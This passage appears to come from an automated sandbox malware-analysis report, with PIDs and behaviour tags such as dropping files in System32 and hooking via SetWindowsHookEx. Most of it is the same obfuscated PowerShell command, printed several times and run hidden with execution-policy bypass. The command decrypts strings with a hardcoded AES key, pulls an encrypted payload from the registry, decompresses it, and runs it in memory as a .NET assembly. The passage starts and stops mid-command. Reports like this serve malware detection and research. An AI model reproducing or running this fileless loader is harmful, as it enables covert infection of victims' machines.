$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        15⤵
        
        PID:3744
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        15⤵
        
        PID:6464
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        15⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:7068
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        16⤵
        
        PID:4796
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 